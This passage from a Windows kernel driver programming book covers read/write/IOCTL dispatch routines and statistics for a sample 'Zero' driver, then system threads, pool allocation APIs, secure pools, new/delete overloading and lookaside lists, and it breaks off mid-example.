auto status = STATUS_SUCCESS;
do {
status = IoCreateDevice(DriverObject, 0, &devName, FILE_DEVICE_UNKNOWN,
0, FALSE, &DeviceObject);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "failed to create device (0x%08X)\n", status));
break;
}
// set up Direct I/O
DeviceObject->Flags |= DO_DIRECT_IO;
status = IoCreateSymbolicLink(&symLink, &devName);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "failed to create symbolic link (0x%08X)\n",
status));
break;
}
} while (false);
if (!NT_SUCCESS(status)) {
if (DeviceObject)
IoDeleteDevice(DeviceObject);
}
return status;
}
The pattern is simple: if an error occurs in any call, just break out of the “loop”. Outside the loop, check
the status, and if it’s a failure, undo any operations done so far. With this scheme in hand, it’s easy to add
more initializations (which we’ll need in more complex drivers), while keeping the cleanup code localized
and appearing just once.
It’s possible to use goto statements instead of the do / while(false) approach, but as the great
Dijkstra wrote, “goto considered harmful”, so I tend to avoid it if I can.
Notice we’re also initializing the device to use Direct I/O for our read and write operations.
The Create and Close Dispatch Routines
Before we get to the actual implementation of IRP_MJ_CREATE and IRP_MJ_CLOSE (pointing to the
same function), let’s create a helper function that simplifies completing an IRP with a given status and
information:
NTSTATUS CompleteIrp(PIRP Irp,
NTSTATUS status = STATUS_SUCCESS,
ULONG_PTR info = 0) {
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = info;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
Notice the default values for the status and information. The Create/Close dispatch routine implementation
becomes almost trivial:
NTSTATUS ZeroCreateClose(PDEVICE_OBJECT, PIRP Irp) {
return CompleteIrp(Irp);
}
The Read Dispatch Routine
The Read routine is the most interesting. First we need to check the length of the buffer to make sure it’s
not zero. If it is, just complete the IRP with a failure status:
NTSTATUS ZeroRead(PDEVICE_OBJECT, PIRP Irp) {
auto stack = IoGetCurrentIrpStackLocation(Irp);
auto len = stack->Parameters.Read.Length;
if (len == 0)
return CompleteIrp(Irp, STATUS_INVALID_BUFFER_SIZE);
Note that the length of the user’s buffer is provided through the Parameters.Read member inside the
current I/O stack location.
We have configured Direct I/O, so we need to map the locked buffer to system space using MmGetSys-
temAddressForMdlSafe:
NT_ASSERT(Irp->MdlAddress);
// make sure Direct I/O flag was set
auto buffer = MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
if (!buffer)
return CompleteIrp(Irp, STATUS_INSUFFICIENT_RESOURCES);
The functionality we need to implement is to zero out the given buffer. We can use a simple memset call
to fill the buffer with zeros and then complete the request:
memset(buffer, 0, len);
return CompleteIrp(Irp, STATUS_SUCCESS, len);
}
If you prefer a more “fancy” function to zero out memory, call RtlZeroMemory. It’s a macro, defined
in terms of memset.
It’s important to set the Information field to the length of the buffer. This indicates to the client the
number of bytes transferred in the operation (returned in the second to last parameter to ReadFile). This
is all we need for the read operation.
The Write Dispatch Routine
The write dispatch routine is even simpler. All it needs to do is complete the request with the buffer length
provided by the client (essentially swallowing the buffer):
NTSTATUS ZeroWrite(PDEVICE_OBJECT, PIRP Irp) {
auto stack = IoGetCurrentIrpStackLocation(Irp);
auto len = stack->Parameters.Write.Length;
return CompleteIrp(Irp, STATUS_SUCCESS, len);
}
Note that we don’t even bother calling MmGetSystemAddressForMdlSafe, as we don’t need to access
the actual buffer. This is also the reason this mapping is not done beforehand by the I/O manager: the driver
may not need it at all, or may need it only in certain conditions; so the I/O manager prepares everything
(the MDL) and lets the driver decide when and if to map the buffer.
Test Application
We’ll add a new console application project to the solution to test the read and write operations.
Here is some simple code to test these operations:
int Error(const char* msg) {
printf("%s: error=%u\n", msg, ::GetLastError());
return 1;
}
int main() {
HANDLE hDevice = CreateFile(L"\\\\.\\Zero", GENERIC_READ | GENERIC_WRITE,
0, nullptr, OPEN_EXISTING, 0, nullptr);
if (hDevice == INVALID_HANDLE_VALUE) {
return Error("Failed to open device");
}
// test read
BYTE buffer[64];
// store some non-zero data
for (int i = 0; i < sizeof(buffer); ++i)
buffer[i] = i + 1;
DWORD bytes;
BOOL ok = ReadFile(hDevice, buffer, sizeof(buffer), &bytes, nullptr);
if (!ok)
return Error("failed to read");
if (bytes != sizeof(buffer))
printf("Wrong number of bytes\n");
// check that all bytes are zero
for (auto n : buffer)
if (n != 0) {
printf("Wrong data!\n");
break;
}
// test write
BYTE buffer2[1024];
// contains junk
ok = WriteFile(hDevice, buffer2, sizeof(buffer2), &bytes, nullptr);
if (!ok)
return Error("failed to write");
if (bytes != sizeof(buffer2))
printf("Wrong byte count\n");
CloseHandle(hDevice);
}
Read/Write Statistics
Let’s add some more functionality to the Zero driver. We may want to count the total bytes read/written
throughout the lifetime of the driver. A user-mode client should be able to read these statistics, and perhaps
even zero them out.
We’ll start by defining two global variables to keep track of the total number of bytes read/written (in
Zero.cpp):
long long g_TotalRead;
long long g_TotalWritten;
You could certainly put these in a structure for easier maintenance and extension. The long long C++
type is a signed 64-bit value. You can add unsigned if you wish, or use typedefs such as LONG64 or
ULONG64, which mean the same thing. Since these are global variables, they are zeroed out by
default.
We’ll create a new file, ZeroCommon.h, that contains information common to user-mode clients and the
driver. This is where we define the control codes we support, as well as data structures to be
shared with user-mode.
First, we’ll add two control codes: one for getting the stats and another for clearing them:
#define DEVICE_ZERO 0x8022

#define IOCTL_ZERO_GET_STATS \
CTL_CODE(DEVICE_ZERO, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_ZERO_CLEAR_STATS \
CTL_CODE(DEVICE_ZERO, 0x801, METHOD_NEITHER, FILE_ANY_ACCESS)
DEVICE_ZERO is defined as some number of 0x8000 or higher, as the documentation recommends. The
function number starts at 0x800 and is incremented with each control code. METHOD_BUFFERED is used
for getting the stats, as the size of the returned data is small (2 x 8 bytes). Clearing the stats requires no
buffers, so METHOD_NEITHER is selected.
Next, we’ll add a structure that can be used by clients (and the driver) for storing the stats:
struct ZeroStats {
long long TotalRead;
long long TotalWritten;
};
In DriverEntry, we add a dispatch routine for IRP_MJ_DEVICE_CONTROL like so:
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ZeroDeviceControl;
All the work is done in ZeroDeviceControl. First, some initialization:
NTSTATUS ZeroDeviceControl(PDEVICE_OBJECT, PIRP Irp) {
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
auto& dic = irpSp->Parameters.DeviceIoControl;
auto status = STATUS_INVALID_DEVICE_REQUEST;
ULONG_PTR len = 0;
The details for IRP_MJ_DEVICE_CONTROL are located in the current I/O stack location in the Parame-
ters.DeviceIoControl structure. The status is initialized to an error in case the control code provided
is unsupported. len keeps track of the number of valid bytes returned in the output buffer.
Implementing the IOCTL_ZERO_GET_STATS is done in the usual way. First, check for errors. If all goes
well, the stats are written to the output buffer:
switch (dic.IoControlCode) {
case IOCTL_ZERO_GET_STATS:
{
// artificial scope so the compiler does not complain
// about defining variables skipped by a case
if (dic.OutputBufferLength < sizeof(ZeroStats)) {
status = STATUS_BUFFER_TOO_SMALL;
break;
}
auto stats = (ZeroStats*)Irp->AssociatedIrp.SystemBuffer;
if (stats == nullptr) {
status = STATUS_INVALID_PARAMETER;
break;
}
//
// fill in the output buffer
//
stats->TotalRead = g_TotalRead;
stats->TotalWritten = g_TotalWritten;
len = sizeof(ZeroStats);
break;
}
Once out of the switch, the IRP is completed. Here is the handling of the stats-clearing Ioctl:
case IOCTL_ZERO_CLEAR_STATS:
g_TotalRead = g_TotalWritten = 0;
break;
}
All that’s left to do is complete the IRP with the final status and length values:
return CompleteIrp(Irp, status, len);
For easier viewing, here is the complete IRP_MJ_DEVICE_CONTROL handling:
NTSTATUS ZeroDeviceControl(PDEVICE_OBJECT, PIRP Irp) {
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
auto& dic = irpSp->Parameters.DeviceIoControl;
auto status = STATUS_INVALID_DEVICE_REQUEST;
ULONG_PTR len = 0;
switch (dic.IoControlCode) {
case IOCTL_ZERO_GET_STATS:
{
if (dic.OutputBufferLength < sizeof(ZeroStats)) {
status = STATUS_BUFFER_TOO_SMALL;
break;
}
auto stats = (ZeroStats*)Irp->AssociatedIrp.SystemBuffer;
if (stats == nullptr) {
status = STATUS_INVALID_PARAMETER;
break;
}
stats->TotalRead = g_TotalRead;
stats->TotalWritten = g_TotalWritten;
len = sizeof(ZeroStats);
break;
}
case IOCTL_ZERO_CLEAR_STATS:
g_TotalRead = g_TotalWritten = 0;
break;
}
return CompleteIrp(Irp, status, len);
}
The stats have to be updated when data is read/written. This must be done in a thread-safe way, as multiple
clients may bombard the driver with read/write requests. Here is the updated ZeroWrite function:
NTSTATUS ZeroWrite(PDEVICE_OBJECT, PIRP Irp) {
auto stack = IoGetCurrentIrpStackLocation(Irp);
auto len = stack->Parameters.Write.Length;
// update the number of bytes written
InterlockedAdd64(&g_TotalWritten, len);
return CompleteIrp(Irp, STATUS_SUCCESS, len);
}
The change to ZeroRead is very similar.
Astute readers may question the safety of the Ioctl implementations. For example, is reading the total
number of bytes read/written with no multithreaded protection (while read/write operations may be
in progress) a correct operation, or is it a data race? Technically, it’s a data race, as the driver might be
updating the stats globals while some client is reading the values, which could result in torn reads. One
way to resolve that is to dispense with the interlocked instructions and use a mutex or a fast mutex to
protect access to these variables. Alternatively, there are functions to deal with these scenarios, such as
ReadAcquire64. Their implementation is CPU-dependent. For x86/x64, they are actually normal reads,
as the processor provides safety against such torn reads. On ARM CPUs, a memory barrier must be
inserted (memory barriers are beyond the scope of this book).
Save the number of bytes read/written to the Registry before the driver unloads. Read it back
when the driver loads.
Replace the Interlocked instructions with a fast mutex to protect access to the stats.
Here is some client code to retrieve these stats:
ZeroStats stats;
if (!DeviceIoControl(hDevice, IOCTL_ZERO_GET_STATS,
nullptr, 0, &stats, sizeof(stats), &bytes, nullptr))
return Error("failed in DeviceIoControl");
printf("Total Read: %lld, Total Write: %lld\n",
stats.TotalRead, stats.TotalWritten);
Summary
In this chapter, we learned how to handle IRPs, which drivers deal with all the time. Armed with this
knowledge, we can start leveraging more kernel functionality, starting with process and thread callbacks
in chapter 9. Before getting to that, however, there are more techniques and kernel APIs that may be useful
for a driver developer, described in the next chapter.
Chapter 8: Advanced Programming
Techniques (Part 1)
In this chapter, we’ll examine various techniques of varying degrees of usefulness to driver developers.
In this chapter:
• Driver Created Threads
• Memory Management
• Calling Other Drivers
• Putting it All Together: The Melody Driver
• Invoking System Services
Driver Created Threads
We’ve seen how to create work items in chapter 6. Work items are useful when some code needs to execute
on a separate thread, and that code is “bound” in time - that is, it’s not too long, so that the driver doesn’t
“steal” a thread from the kernel worker threads. For long operations, however, it’s preferable that drivers
create their own separate thread(s). Two functions are available for this purpose:
NTSTATUS PsCreateSystemThread(
_Out_ PHANDLE ThreadHandle,
_In_ ULONG DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext);

// Win 8 and later
NTSTATUS IoCreateSystemThread(
_Inout_ PVOID IoObject,
_Out_ PHANDLE ThreadHandle,
_In_ ULONG DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext);
Both functions have the same set of parameters except the additional first parameter to IoCreateSys-
temThread. The latter function takes an additional reference on the object passed in (which must be
a device object or a driver object), so the driver is not unloaded prematurely while the thread is alive.
IoCreateSystemThread is only available for Windows 8 and later systems. Here is a description of the
other parameters:
• ThreadHandle is the address of a handle to the created thread if successful. The driver must use
ZwClose to close the handle at some point.
• DesiredAccess is the access mask requested. Drivers should simply use THREAD_ALL_ACCESS
to get all possible access with the resulting handle.
• ObjectAttributes is the standard OBJECT_ATTRIBUTES structure. Most members have no
meaning for a thread. The most common attribute to request for the returned handle is OBJ_KERNEL_HANDLE,
but it’s not needed if the thread is to be created in the System process - just pass
NULL, which always returns a kernel handle.
• ProcessHandle is a handle to the process where this thread should be created. Drivers should
pass NULL to indicate the thread should be part of the System process so it’s not tied to any specific
process’ lifetime.
• ClientId is an optional output structure, providing the process and thread ID of the newly created
thread. In most cases, this information is not needed, and NULL can be specified.
• StartRoutine is the function to execute in a separate thread of execution. This function must
have the following prototype:
VOID KSTART_ROUTINE (_In_ PVOID StartContext);
The StartContext value is provided by the last parameter to Ps/IoCreateSystemThread. This could
be anything (or NULL) that would give the new thread data to work with.
The function indicated by StartRoutine will start execution on a separate thread. It runs at
IRQL PASSIVE_LEVEL (0) inside a critical region (where normal kernel APCs are disabled).
For PsCreateSystemThread, exiting the thread function is not enough to terminate the thread. An
explicit call to PsTerminateSystemThread is required to properly manage the thread’s lifetime:
NTSTATUS PsTerminateSystemThread(_In_ NTSTATUS ExitStatus);
The exit status is the exit code of the thread, which can be retrieved with PsGetThreadExitStatus if
desired.
For IoCreateSystemThread, exiting the thread function is sufficient, as PsTerminateSystemThread
is called on its behalf when the thread function returns. The exit code of the thread is always STATUS_-
SUCCESS.
IoCreateSystemThread is a wrapper around PsCreateSystemThread that increments
the ref count of the passed in device/driver object, calls PsCreateSystemThread and then
decrements the ref count and calls PsTerminateSystemThread.
Memory Management
We have looked at the most common functions for dynamic memory allocation in chapter 3. The most
useful is ExAllocatePoolWithTag, which we have used multiple times in previous chapters. There are
other functions for dynamic memory allocation you might find useful. Then, we’ll examine lookaside lists,
which allow more efficient memory management when fixed-size chunks are needed.
Pool Allocations
In addition to ExAllocatePoolWithTag, the Executive provides an extended version that indicates the
importance of an allocation, taken into account in low memory conditions:
typedef enum _EX_POOL_PRIORITY {
LowPoolPriority,
LowPoolPrioritySpecialPoolOverrun = 8,
LowPoolPrioritySpecialPoolUnderrun = 9,
NormalPoolPriority = 16,
NormalPoolPrioritySpecialPoolOverrun = 24,
NormalPoolPrioritySpecialPoolUnderrun = 25,
HighPoolPriority = 32,
HighPoolPrioritySpecialPoolOverrun = 40,
HighPoolPrioritySpecialPoolUnderrun = 41
} EX_POOL_PRIORITY;
PVOID ExAllocatePoolWithTagPriority (
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag,
_In_ EX_POOL_PRIORITY Priority);
The priority-related values indicate the importance of succeeding an allocation if system memory is low
(LowPoolPriority), very low (NormalPoolPriority), or completely out of memory (HighPoolPriority).
In any case, the driver should be prepared to handle a failure.
The “special pool” values tell the Executive to make the allocation at the end of a page (“Overrun” values)
or beginning of a page (“Underrun”) values, so it’s easier to catch buffer overflow or underflow. These
values should only be used while tracking memory corruptions, as each allocation costs at least one page.
Starting with Windows 10 version 1909 (and Windows 11), two new pool allocation functions are supported.
The first is ExAllocatePool2 declared like so:
PVOID ExAllocatePool2 (
_In_ POOL_FLAGS Flags,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag);
Where the POOL_FLAGS enumeration consists of a combination of values shown in table 8-1:
Table 8-1: Flags for ExAllocatePool2

Flag (POOL_FLAG_)       Must recognize?   Description
USE_QUOTA               Yes               Charge allocation to calling process
UNINITIALIZED           Yes               Contents of allocated memory is not touched.
                                          Without this flag, the memory is zeroed out
CACHE_ALIGNED           Yes               Address should be CPU-cache aligned. This is
                                          "best effort"
RAISE_ON_FAILURE        Yes               Raises an exception (STATUS_INSUFFICIENT_RESOURCES)
                                          instead of returning NULL if allocation fails
NON_PAGED               Yes               Allocate from non-paged pool. The memory is
                                          executable on x86, and non-executable on all
                                          other platforms
PAGED                   Yes               Allocate from paged pool. The memory is executable
                                          on x86, and non-executable on all other platforms
NON_PAGED_EXECUTABLE    Yes               Non-paged pool with execute permissions
SPECIAL_POOL            No                Allocates from "special" pool (separate from the
                                          normal pool so it's easier to find memory
                                          corruptions)
The Must recognize? column indicates whether failure to recognize or satisfy the flag causes the function
to fail.
The second allocation function, ExAllocatePool3, is extensible, so new functions of this sort are
unlikely to pop up in the future:
PVOID ExAllocatePool3 (
_In_ POOL_FLAGS Flags,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag,
_In_reads_opt_(ExtendedParametersCount)
PCPOOL_EXTENDED_PARAMETER ExtendedParameters,
_In_ ULONG ExtendedParametersCount);
This function allows customization with an array of “parameters”, where the supported parameter types
may be extended in future kernel versions. The currently available parameters are defined with the POOL_-
EXTENDED_PARAMETER_TYPE enumeration:
typedef enum POOL_EXTENDED_PARAMETER_TYPE {
PoolExtendedParameterInvalidType = 0,
PoolExtendedParameterPriority,
PoolExtendedParameterSecurePool,
PoolExtendedParameterNumaNode,
PoolExtendedParameterMax
} POOL_EXTENDED_PARAMETER_TYPE, *PPOOL_EXTENDED_PARAMETER_TYPE;
The array provided to ExAllocatePool3 consists of structures of type POOL_EXTENDED_PARAMETER,
each one specifying one parameter:
typedef struct _POOL_EXTENDED_PARAMETER {
struct {
ULONG64 Type : 8;
ULONG64 Optional : 1;
ULONG64 Reserved : 64 - 9;
};
union {
ULONG64 Reserved2;
PVOID Reserved3;
EX_POOL_PRIORITY Priority;
POOL_EXTENDED_PARAMS_SECURE_POOL* SecurePoolParams;
POOL_NODE_REQUIREMENT PreferredNode; // ULONG
};
} POOL_EXTENDED_PARAMETER, *PPOOL_EXTENDED_PARAMETER;
The Type member indicates which of the union members is valid for this parameter (POOL_EXTENDED_PARAMETER_TYPE).
Optional indicates whether the parameter is optional or required. An optional
parameter that fails to be satisfied does not cause ExAllocatePool3 to fail. Based on Type, the
correct member in the union must be set. Currently, these parameters are available:
• Priority of the allocation (Priority member)
• Preferred NUMA node (PreferredNode member)
• Use secure pool (discussed later, SecurePoolParams member)
The following example shows using ExAllocatePool3 to achieve the same effect as ExAllocatePool-
WithTagPriority for non-paged memory:
PVOID AllocNonPagedPriority(ULONG size, ULONG tag, EX_POOL_PRIORITY priority) {
POOL_EXTENDED_PARAMETER param;
param.Optional = FALSE;
param.Type = PoolExtendedParameterPriority;
param.Priority = priority;
return ExAllocatePool3(POOL_FLAG_NON_PAGED, size, tag, &param, 1);
}
Secure Pools
Secure pools introduced in Windows 10 version 1909 allow kernel callers to have a memory pool that
cannot be accessed by other kernel components. This kind of protection is internally achieved by the
Hyper-V hypervisor, leveraging its power to protect memory access even from the kernel, as the memory
is part of Virtual Trust Level (VTL) 1 (the secure world). Currently, secure pools are not fully documented,
but here are the basic steps to use a secure pool.
Secure pools are only available if Virtualization Based Security (VBS) is active (meaning Hyper-
V exists and creates the two worlds - normal and secure). Discussion of VBS is beyond the scope
of this book. Consult information online (or the Windows Internals books) for more on VBS.
A secure pool can be created with ExCreatePool, returning a handle to the pool:
#define POOL_CREATE_FLG_SECURE_POOL 0x1
#define POOL_CREATE_FLG_USE_GLOBAL_POOL 0x2
#define POOL_CREATE_FLG_VALID_FLAGS (POOL_CREATE_FLG_SECURE_POOL | \
POOL_CREATE_FLG_USE_GLOBAL_POOL)
NTSTATUS ExCreatePool (
_In_ ULONG Flags,
_In_ ULONG_PTR Tag,
_In_opt_ POOL_CREATE_EXTENDED_PARAMS* Params,
_Out_ HANDLE* PoolHandle);
Currently, flags should be POOL_CREATE_FLG_VALID_FLAGS (both supported flags), and Params
should be NULL. PoolHandle contains the pool handle if the call succeeds.
Allocating from a secure pool must be done with ExAllocatePool3, described in the previous section
with a POOL_EXTENDED_PARAMS_SECURE_POOL structure as a parameter:
#define SECURE_POOL_FLAGS_NONE 0x0
#define SECURE_POOL_FLAGS_FREEABLE 0x1
#define SECURE_POOL_FLAGS_MODIFIABLE 0x2

typedef struct _POOL_EXTENDED_PARAMS_SECURE_POOL {
HANDLE SecurePoolHandle; // pool handle
PVOID Buffer; // initial data
ULONG_PTR Cookie; // for validation
ULONG SecurePoolFlags; // flags above
} POOL_EXTENDED_PARAMS_SECURE_POOL;
Buffer points to existing data to be initially stored in the new allocation. Cookie is used for validation,
by calling ExSecurePoolValidate. Freeing memory from a secure pool must be done with a new
function, ExFreePool2:
VOID ExFreePool2 (
_Pre_notnull_ PVOID P,
_In_ ULONG Tag,
_In_reads_opt_(ExtendedParametersCount)
PCPOOL_EXTENDED_PARAMETER ExtendedParameters,
_In_ ULONG ExtendedParametersCount);
If ExtendedParameters is NULL (and ExtendedParametersCount is zero), the call is diverted to
the normal ExFreePool, which will fail for a secure pool. For a secure pool, a single POOL_EXTENDED_PARAMETER
is required, holding the secure pool parameters with the pool handle only. Buffer should be NULL.
Finally, a secure pool must be destroyed with ExDestroyPool:
VOID ExDestroyPool (_In_ HANDLE PoolHandle);
Overloading the new and delete Operators
We know there is no C++ runtime in the kernel, which means some C++ features that work as expected in
user mode don’t work in kernel mode. Among these are the new and delete C++ operators.
Although we can use the dynamic memory allocation functions directly, new and delete have a couple of
advantages over calling the raw functions:
• new causes a constructor to be invoked, and delete causes the destructor to be invoked.
• new accepts a type for which memory must be allocated, rather than specifying a number of bytes.
Fortunately, C++ allows overloading the new and delete operators, either globally or for specific types.
new can be overloaded with extra parameters that are needed for kernel allocations - at least the pool type
must be specified. The first argument to any overloaded new is the number of bytes to allocate, and any
extra parameters can be added after that. These are specified within parentheses when actually used. The
compiler inserts a call to the appropriate constructor, if one exists.
Here is a basic implementation of an overloaded new operator that calls ExAllocatePoolWithTag:
void* __cdecl operator new(size_t size, POOL_TYPE pool, ULONG tag) {
return ExAllocatePoolWithTag(pool, size, tag);
}
The __cdecl modifier indicates this should be using the C calling convention (rather than the __stdcall
convention). It only matters in x86 builds, but still should be specified as shown.
Here is an example usage, assuming an object of type MyData needs to be allocated from paged pool:
MyData* data = new (PagedPool, DRIVER_TAG) MyData;
if(data == nullptr)
return STATUS_INSUFFICIENT_RESOURCES;
// do work with data
The size parameter is never specified explicitly as the compiler inserts the correct size (which is essentially
sizeof(MyData) in the above example). All other parameters must be specified. We can make the
overload simpler to use if we default the tag to a macro such as DRIVER_TAG, expected to exist:
void* __cdecl operator new(size_t size, POOL_TYPE pool,
ULONG tag = DRIVER_TAG) {
return ExAllocatePoolWithTag(pool, size, tag);
}
And the corresponding usage is simpler:
MyData* data = new (PagedPool) MyData;
In the above examples, the default constructor is invoked, but it’s perfectly valid to invoke any other
constructor that exists for the type. For example:
struct MyData {
MyData(ULONG someValue);
// details not shown
};
auto data = new (PagedPool) MyData(200);
We can easily extend the overloading idea to other overloads, such as one that wraps ExAllocatePool-
WithTagPriority:
void* __cdecl operator new(size_t size, POOL_TYPE pool,
EX_POOL_PRIORITY priority, ULONG tag = DRIVER_TAG) {
return ExAllocatePoolWithTagPriority(pool, size, tag, priority);
}
Using the above operator is just a matter of adding a priority in parenthesis:
auto data = new (PagedPool, LowPoolPriority) MyData(200);
Another common case is where you already have an allocated block of memory to store some object
(perhaps allocated by a function out of your control), but you still want to initialize the object by invoking
a constructor. Another new overload can be used for this purpose, known as placement new, since it does
not allocate anything, but the compiler still adds a call to a constructor. Here is how to define a placement
new operator overload:
void* __cdecl operator new(size_t size, void* p) {
return p;
}
And an example usage:
void* SomeFunctionAllocatingObject();
MyData* data = (MyData*)SomeFunctionAllocatingObject();
new (data) MyData;
Finally, an overload for delete is required so the memory can be freed at some point, calling the destructor
if it exists. Here is how to overload the delete operator:
void __cdecl operator delete(void* p, size_t) {
ExFreePool(p);
}
The extra size parameter is not used in practice (zero is always the value provided), but the compiler
requires it.
Remember that you cannot have global objects that have default constructors that do some-
thing, since there is no runtime to invoke them. The compiler will report a warning if you
try. A way around it (of sorts) is to declare the global variable as a pointer, and then use an
overloaded new to allocate and invoke a constructor in DriverEntry. Of course, you must
remember to call delete in the driver’s unload routine.
Another variant of the delete operator the compiler might insist on if you set the compiler
conformance to C++17 or newer is the following:
void __cdecl operator delete(void* p, size_t, std::align_val_t) {
ExFreePool(p);
}
You can look up the meaning of std::align_val_t in a C++ reference, but it does not matter
for our purposes.
Lookaside Lists
The dynamic memory allocation functions discussed so far (the ExAllocatePool* family of APIs) are
generic in nature, and can accommodate allocations of any size. Internally, managing the pool is non-trivial:
various lists are needed to manage allocations and deallocations of different sizes. This management aspect
of the pools is not free.
One fairly common case that leaves room for optimization is when fixed-size allocations are needed.
When such an allocation is freed, it’s possible to not actually free it, but just mark it as available. The next
allocation request can be satisfied from the existing block, which is much faster than allocating a fresh
block. This is exactly the purpose of lookaside lists.
There are two APIs for working with lookaside lists: the original one, available since Windows 2000,
and a newer one, available since Vista. I'll describe both, as they are quite similar.
The “Classic” Lookaside API
The first thing to do is to initialize the data structure managing a lookaside list. Two functions are available,
which are essentially the same, selecting the paged pool or non-paged pool where the allocations should be
coming from. Here is the paged pool version:
VOID ExInitializePagedLookasideList (
_Out_ PPAGED_LOOKASIDE_LIST Lookaside,
_In_opt_ PALLOCATE_FUNCTION Allocate,
_In_opt_ PFREE_FUNCTION Free,
_In_ ULONG Flags,
_In_ SIZE_T Size,
_In_ ULONG Tag,
_In_ USHORT Depth);
The non-paged variant is practically the same, with the function name being ExInitializeNPagedLookasideList.
The first parameter is the resulting initialized structure. Although the structure layout is described in
wdm.h (with a macro named GENERAL_LOOKASIDE_LAYOUT to accommodate multiple uses that can't
be shared in other ways using the C language), you should treat this structure as opaque.
The Allocate parameter is an optional allocation function that is called by the lookaside implementation
when a new allocation is required. If specified, the allocation function must have the following prototype:
PVOID AllocationFunction (
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag);
The allocation function receives the same parameters as ExAllocatePoolWithTag. In fact, if the
allocation function is not specified, this is the call made by the lookaside list manager. If you don’t
require any other code, just specify NULL. A custom allocation function could be useful for debugging
purposes, for example. Another possibility is to call ExAllocatePoolWithTagPriority instead of
ExAllocatePoolWithTag, if that makes sense for your driver.
If you do provide an allocation function, you might need to provide a de-allocation function in the Free
parameter. If not specified, the lookaside list manager calls ExFreePool. Here is the expected prototype
for this function:
VOID FreeFunction (
_In_ __drv_freesMem(Mem) PVOID Buffer);
The next parameter, Flags can be zero or POOL_RAISE_IF_ALLOCATION_FAILURE (Windows 8 and
later) that indicates an exception should be raised (STATUS_INSUFFICIENT_RESOURCE) if an allocation
fails, instead of returning NULL to the caller.
The Size parameter is the size of chunks managed by the lookaside list. Usually, you would specify it as
sizeof some structure you want to manage. Tag is the tag to use for allocations. Finally, the last parameter,
Depth, indicates the number of allocations to keep in a cache. The documentation indicates this parameter
is “reserved” and should be zero, which lets the lookaside list manager choose something appropriate.
Regardless of the number, the “depth” is adjusted based on the allocation patterns used with the lookaside
list.
Once a lookaside list is initialized, you can request a memory block (of the size specified in the initialization
function, of course) by calling ExAllocateFromPagedLookasideList:
PVOID ExAllocateFromPagedLookasideList (
_Inout_ PPAGED_LOOKASIDE_LIST Lookaside)
Nothing could be simpler - no special parameters are required, since everything else is already known. The
corresponding function for a non-paged pool lookaside list is ExAllocateFromNPagedLookasideList.
The opposite function, used to free an allocation (or return it to the cache), is ExFreeToPagedLookasideList:
VOID ExFreeToPagedLookasideList (
_Inout_ PPAGED_LOOKASIDE_LIST Lookaside,
_In_ __drv_freesMem(Mem) PVOID Entry)
The only value required is the pointer to free (or return to the cache). As you can probably guess, the non-paged
pool variant is ExFreeToNPagedLookasideList.
Finally, when the lookaside list is no longer needed, it must be freed by calling ExDeletePagedLookasideList:
VOID ExDeletePagedLookasideList (
_Inout_ PPAGED_LOOKASIDE_LIST Lookaside);
One nice benefit of lookaside lists is that you don’t have to return all allocations to the list by repeatedly
calling ExFreeToPagedLookasideList before calling ExDeletePagedLookasideList; the latter
is enough, and will free all allocated blocks automatically. ExDeleteNPagedLookasideList is the
corresponding non-paged variant.
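Putting the classic API together, a typical lifecycle looks roughly like the following sketch (MyItem and DRIVER_TAG are driver-defined placeholder names, not part of the API):

```cpp
// Sketch only: MyItem and DRIVER_TAG are driver-defined placeholders.
struct MyItem {
    ULONG Id;
    // ... more fixed-size data ...
};

PAGED_LOOKASIDE_LIST g_Lookaside;

// typically in DriverEntry: default allocate/free functions, default depth
ExInitializePagedLookasideList(&g_Lookaside, nullptr, nullptr, 0,
    sizeof(MyItem), DRIVER_TAG, 0);

// whenever an item is needed (IRQL <= APC_LEVEL for paged lists):
auto item = (MyItem*)ExAllocateFromPagedLookasideList(&g_Lookaside);
if (item) {
    item->Id = 1;
    // ... use the item, then return it to the cache ...
    ExFreeToPagedLookasideList(&g_Lookaside, item);
}

// in the unload routine: frees any cached blocks as well
ExDeletePagedLookasideList(&g_Lookaside);
```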
Write a C++ class wrapper for lookaside lists using the above APIs.
The Newer Lookaside API
The newer API provides two main benefits over the classic API:
• Uniform API for paged and non-paged blocks.
• The lookaside list structure itself is passed to the custom allocate and free functions (if provided),
that allows accessing driver data (example shown later).
Initializing a lookaside list is accomplished with ExInitializeLookasideListEx:
NTSTATUS ExInitializeLookasideListEx (
_Out_ PLOOKASIDE_LIST_EX Lookaside,
_In_opt_ PALLOCATE_FUNCTION_EX Allocate,
_In_opt_ PFREE_FUNCTION_EX Free,
_In_ POOL_TYPE PoolType,
_In_ ULONG Flags,
_In_ SIZE_T Size,
_In_ ULONG Tag,
_In_ USHORT Depth);
PLOOKASIDE_LIST_EX is the opaque data structure to initialize, which must be allocated from non-paged
memory, regardless of whether the lookaside list is to manage paged or non-paged memory.
The allocation and free functions are optional, just as they are with the classic API. These are their
prototypes:
PVOID AllocationFunction (
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag,
_Inout_ PLOOKASIDE_LIST_EX Lookaside);
VOID FreeFunction (
_In_ __drv_freesMem(Mem) PVOID Buffer,
_Inout_ PLOOKASIDE_LIST_EX Lookaside);
Notice the lookaside list itself is a parameter. This could be used to access driver data that is part of a larger
structure containing the lookaside list. For example, suppose the driver has the following structure:
struct MyData {
